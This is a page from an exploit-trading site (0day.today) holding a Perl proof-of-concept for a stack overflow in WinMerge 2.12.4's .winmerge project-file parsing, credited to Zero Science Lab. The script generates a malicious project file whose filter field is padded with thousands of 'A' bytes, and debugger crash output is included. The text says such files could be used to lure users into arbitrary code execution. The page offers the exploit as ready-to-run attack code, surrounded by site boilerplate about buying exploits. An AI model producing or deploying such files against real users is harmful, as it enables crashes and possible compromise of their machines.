0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability
#!/usr/bin/perl # # # Title: WinMerge v2.12.4 Project File Handling Stack Overflow Vulnerability # # # Vendor: Thingamahoochie Software # Product web page: http://www.winmerge.org # Affected version: 2.12.4.0 Unicode # # Summary: WinMerge is an Open Source differencing and merging tool for Windows. # WinMerge can compare both folders and files, presenting differences in a visual # text format that is easy to understand and handle. WinMerge is highly useful for # determining what has changed between project versions, and then merging changes # between versions. WinMerge can be used as an external differencing/merging tool # or as a standalone application. # # Desc: WinMerge version 2.12.4 suffers from a stack overflow vulnerability because # it fails to properly sanitize user supplied input when parsing .winmerge project # file format resulting in a crash overflowing the memory stack. The attacker can # use this scenario to lure unsuspecting users to open malicious crafted .winmerge # files with a potential for arbitrary code execution on the affected system. # # Tested on: Microsoft Windows XP Professional SP3 (EN) # # -------------------------------------------------------------------------------- # # (e34.10b0): Stack overflow - code c00000fd (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000011 ebx=0001f83c ecx=50000161 edx=7ffe0300 esi=00000000 edi=00c30000 # eip=7c90cf78 esp=00033000 ebp=00033238 iopl=0 nv up ei pl nz na po nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202 # ntdll!NtAllocateVirtualMemory+0xa: # 7c90cf78 ff12 call dword ptr [edx] ds:0023:7ffe0300={ntdll!KiFastSystemCall (7c90e510)} # 0:000> g # (e34.10b0): C++ EH exception - code e06d7363 (first chance) # (e34.10b0): Access violation - code c0000005 (first chance) # First chance exceptions are reported before any exception handling. # This exception may be expected and handled. # eax=00000d28 ebx=00523001 ecx=00000000 edx=00000000 esi=00000000 edi=00031ad8 # eip=7c90e8e5 esp=00030c9c ebp=000319d4 iopl=0 nv up ei pl nz ac pe nc # cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010216 # ntdll!strchr+0xd8: # 7c90e8e5 53 push ebx # # -------------------------------------------------------------------------------- # # # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic # liquidworm gmail com # Zero Science Lab - http://www.zeroscience.mk # # # Advisory ID: ZSL-2010-4997 # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-4997.php # # # 08.02.2011 # use strict; my $project = "thricer.winmerge"; my $begining = "\x3C\x3F\x78\x6D\x6C\x20\x76\x65\x72\x73\x69\x6F\x6E\x3D\x22\x31\x2E". "\x30\x22\x20\x65\x6E\x63\x6F\x64\x69\x6E\x67\x3D\x22\x55\x54\x46\x2D". "\x38\x22\x20\x73\x74\x61\x6E\x64\x61\x6C\x6F\x6E\x65\x3D\x22\x79\x65". "\x73\x22\x3F\x3E\x0D\x0A\x0D\x0A\x3C\x70\x72\x6F\x6A\x65\x63\x74\x3E". "\x0D\x0A\x20\x20\x20\x3C\x70\x61\x74\x68\x73\x3E\x0D\x0A\x20\x20\x20". "\x20\x20\x20\x3C\x66\x69\x6C\x74\x65\x72\x3E"; my $load = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"; my $ending = "\x2A\x2E\x2A\x3C\x2F\x66\x69\x6C\x74\x65\x72\x3E\x0D\x0A\x20\x20\x20". "\x20\x20\x20\x3C\x73\x75\x62\x66\x6F\x6C\x64\x65\x72\x73\x3E\x30\x3C". "\x2F\x73\x75\x62\x66\x6F\x6C\x64\x65\x72\x73\x3E\x0D\x0A\x20\x20\x20". "\x20\x20\x20\x3C\x6C\x65\x66\x74\x2D\x72\x65\x61\x64\x6F\x6E\x6C\x79". "\x3E\x30\x3C\x2F\x6C\x65\x66\x74\x2D\x72\x65\x61\x64\x6F\x6E\x6C\x79". "\x3E\x0D\x0A\x20\x20\x20\x20\x20\x20\x3C\x72\x69\x67\x68\x74\x2D\x72". "\x65\x61\x64\x6F\x6E\x6C\x79\x3E\x30\x3C\x2F\x72\x69\x67\x68\x74\x2D". "\x72\x65\x61\x64\x6F\x6E\x6C\x79\x3E\x0D\x0A\x20\x20\x20\x3C\x2F\x70". "\x61\x74\x68\x73\x3E\x0D\x0A\x3C\x2F\x70\x72\x6F\x6A\x65\x63\x74\x3E". "\x0D\x0A"; print "\n\n[*] Buffering \"$project\" file ...\n"; open winmerge, ">./$project" || die "\nCan't open $project: $!"; print winmerge $begining.$load x(2391-142+1000).$ending; sleep 2; print "\n[*] File created successfully!\n\n"; close winmerge; # 0day.today [2024-07-05] #